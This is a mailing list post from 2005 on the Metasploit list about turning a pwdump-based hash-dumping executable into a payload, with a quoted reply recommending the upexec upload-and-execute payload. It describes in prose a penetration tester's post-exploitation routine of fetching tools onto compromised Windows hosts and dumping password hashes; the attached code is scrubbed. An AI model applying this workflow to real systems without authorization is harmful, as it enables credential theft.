Metasploit mailing list archives
making your own payload
From: unknown.pentester at gmail.com (pagvac)
Date: Tue, 6 Dec 2005 17:01:18 +0000
I'll probably use the upexec payload since it seems very ideal in this case. Let me explain my exact scenario: When pentesting, some of the things we all do are very much the same all the time. For instance, I do the following steps all the time after getting a shell with admin privileges on a Windows machine (workstation, server or domain controller): -enable a tftp server on my laptop (I use Solarwinds TFTP server) -connect to my tftp server from the compromised target and download the pwdump executable and dll file (which is required to run the executable) So what I did is the following. I wrote a simple and crappy program in C that drops pwdump2.exe and samdump.dll once it's executed. After that it dumps the passwords hashes (by calling the dropped pwdump2.exe) and prints them on the screen.
From this point on I can just grab the hashes from the remote shell
with a simple-and-lame copy and paste. Anyways, I attached the .c and .exe file in case anyone is interested. The reason why I wrote this is because I wanted make the root-shell/dump-hashes process a single shot attack. But now that you guys pointed me out the upexec payload, it seems to me very stupid to waste my time setting up a tftp server on my laptop, when I can just tell metasploit to transfer and execute my "pwdump2.payload.exe" file when exploiting the target. Thank you very much for your help to both of you. On 12/6/05, mmiller at hick.org <mmiller at hick.org> wrote:
On Tue, Dec 06, 2005 at 04:24:04PM +0000, pagvac wrote:I have an executable file which I would like to convert into a payload. That way I could use it with all the exploits that metasploit supports. This executable automates many tasks that I usually do on the target machines after comprising them when doing penetration testing. The problem is that I have no idea on how to remove all the nulls (0x00) so that the exploit doesn't break. I'd like to have some references on documentation/tools that can help me create this payload and successfully run it with metasploit on existing exploit modules. Question: are all payloads compatible with metasploit? In other words, can I get a shellcode from an external resource and use it successfully with metasploit?Converting an executable into shellcode is typically infeasible due to the nature in which most executables are compiled. One of the constraints also becomes the size of the shellcode produced and the manner in which it is to be transferred to the target. Is there a reason that you can't use the upexec payloads (upload and execute)? win32_xxx_upexec
-------------- next part -------------- A non-text attachment was scrubbed... Name: pwdump2.payload.c Type: application/octet-stream Size: 430164 bytes Desc: not available URL: <http://mail.metasploit.com/pipermail/framework/attachments/20051206/0a0239f6/attachment.obj> -------------- next part -------------- A non-text attachment was scrubbed... Name: pwdump2.payload.exe.bin Type: application/octet-stream Size: 106496 bytes Desc: not available URL: <http://mail.metasploit.com/pipermail/framework/attachments/20051206/0a0239f6/attachment.bin>
Current thread:
- making your own payload pagvac (Dec 06)
- making your own payload H D Moore (Dec 06)
- making your own payload mmiller at hick.org (Dec 06)
- making your own payload pagvac (Dec 06)
- making your own payload mmiller at hick.org (Dec 06)
- making your own payload H D Moore (Dec 06)
- making your own payload Andre Ludwig (Dec 06)
- making your own payload Jerome Athias (Dec 06)
- making your own payload pagvac (Dec 06)